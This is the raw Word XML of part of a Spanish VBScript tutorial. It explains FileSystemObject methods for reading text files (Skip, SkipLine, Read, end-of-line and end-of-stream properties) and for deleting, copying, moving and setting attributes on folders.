          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Skip </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se salta un número de caracteres determinado. Esto es útil si lo que te interesa es un trozo solo del archivo. Abajo un ejemplo de esta función combinado con la función read para leer desde el caracter cinco hasta el diez.</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432"/>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942"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fso.OpenTextFile("c:\Doc2.txt", 1)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Skip(5)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Read(5)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unción </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">SkipLine </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se salta una línea para no leerla. Esto es útil si lo que te interesa es una línea determinada del archivo. Abajo un ejemplo de esta función combinado con la función readline para leer la segunda línea de un archivo.</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432"/>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942"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fso.OpenTextFile("c:\Doc2.txt", 1)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SkipLine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ReadLin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último lugar, en la </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">cuarta linea </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">se escribe </w:t>
      </w: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para cerrar el archivo. No se debe omitir. (Recuerda qu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y fso son variables y puedes llamarlas como quiera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Se puede saber cuando se llega al final de línea y/o del archivo por medio de las propiedades </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>AtEndOfLine, AtEndOfStream y Line</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Si se llega al final de una línea, </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">AtEndOfLine </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">recibe el valor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en cambio, si se llega a final del archivo, es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>AtEndOfStream</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> quien recibe ese valor.</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unido con el bucle do...loop permite hacer cosas como la que hace el siguiente script:</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984"/>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OpenTextFile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("c:\Doc2.txt",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spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="1679"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Skip(1)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lectura&amp;var</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">.Read(1) Loop Until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AtEndOfLine=True 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pequeño script permite que se lea una letra si, una no hasta que se llega a final de línea. Al leer una letra, la guarda en lectura, al leer la siguiente, la guarda junto con la anterior en lectura y así sucesivamente hasta que </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">AtEndOfLine </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">recibe el valor True (significa que ya ha llegado al final de la línea), el bucle se rompe y deja de leer. El mismo uso se le podía dar a </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">AtEndOfStream </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>para que parara en vez de al final de línea, lo hiciera al final del archivo.</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708"/>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OpenTextFile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("c:\Doc2.txt",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Skip</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="140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lectura&amp;var</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">.Read(1) Loop Until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AtEndOfStream=True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:left w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="000000"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:after="308" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="17"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pP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roofErr w:type="gramEnd"/>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Por último,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Line</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> nos indica cuando </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>empieza</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> una línea determinada. Si estamos en la línea 5, Line tendrá el valor 5. A continuación el ejemplo anterior, pero esta vez parando en la línea 4, es decir, cuando empiece la quinta línea.</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1984"/>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OpenTextFile</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>("c:\Doc2.txt",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Skip</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(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lectura&amp;</w:t>
            </w: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Read</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(1)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="2095"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oop Until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Line=5 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t>Como podemos ver, las posibilidades son muchas. Por último, y antes de cerrar este capitulo, hay que saber como podemos escribir a mitad del archivo. La cosa es sencilla, lees la primera parte, la guardas en una variable, lees la segunda, la guardas en otra, borras el archivo, escribes toda la primera parte, lo que querías añadir a mitad, y toda la segunda parte. Siento decepcionar, pero en eso consiste la programación: Tus barreras estarán allí donde tu ingenio no llegue. Bueno, y con esto insistir una vez más en practicar y decir que esto es todo con los archivos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="77" w:right="1"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Programación con Objetos: Carpetas y Disco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hora vamos a ver un grupo de funciones, que permiten realizar las </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">tareas básicas de tratamiento de carpetas y discos. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En otras palabras, aprenderemos a que nuestro script pueda borrar, copiar, mover, renombrar, etc cualquier tipo de carpeta que tengamos; y analizar, listar y trabajar con todos los discos (extraíbles y duros) de nuestro PC. Para ello, veamos las diversas funciones que tenemos a disposición. Las siguientes funciones necesitan los objetos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Scripting.FileSystemObject </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y</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u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WScript.Shell.</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DeleteFolder</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función borra la carpeta que le indiquemos y todo su contenido.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indica que si se eliminan las carpetas con el atributo de solo lectura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que no lo hace. La sintaxis "c:\carpeta" indica la ruta de la carpeta que se va a eliminar. Su uso es muy similar al de la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>DeleteFile</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>; de hecho, todas estas funciones se parecen mucho a las que trabajan con archivos:</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DeleteFolder </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\carpeta"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, Tru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lastRenderedPageBreak/>
        <w:t>La segund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CopyFolder</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función copia la carpeta que le indiquemos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y todo su contenido</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. La sintaxis </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\carpeta"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, indica la ruta, y la carpeta que se va a copiar y la sintaxis </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"c:\Mis Documentos\carpeta"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> indica la ruta y el nombre a donde se copia la carpeta y su contenido. Esta función también se utiliza para </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>renombrar carpetas</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, moviéndolas al mismo sitio donde </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>estaban</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero cambiándoles el nombr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1801"/>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CopyFolder </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c:\carpeta</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 "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c:\Mis Documentos\carpeta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w: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terc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MoveFolder</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función mueve la carpeta que le indiquemos y todo su contenido. La sintaxis "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c:\carpeta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">", indica la ruta y la carpeta que se va a mover y la sintaxis </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c:\Mis Documentos\carpeta</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indica la ruta y el nombre de destino.</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1777"/>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MoveFolder </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c:\carpeta</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 "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c:\Mis Documentos\carpeta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>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cuar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Attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función cambia los atributos de la carpeta indicada, y se usa exactamente igual que la función que hace lo mismo con archivos, con la diferencia que aquí en la línea 2 usamos </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GetFolder</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y no </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GetFile</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, y que, por tanto, la estructura que le damos a </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>arc</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> es la de una carpeta. En la segunda línea se indica la ruta de la carpeta mediante "</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:i/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c:\carpeta</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>". En la tercera se le dan los nuevos atributos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="10"/>
        <w:ind w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Para quitarlos todos se coloca el 0 solo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:after="269"/>
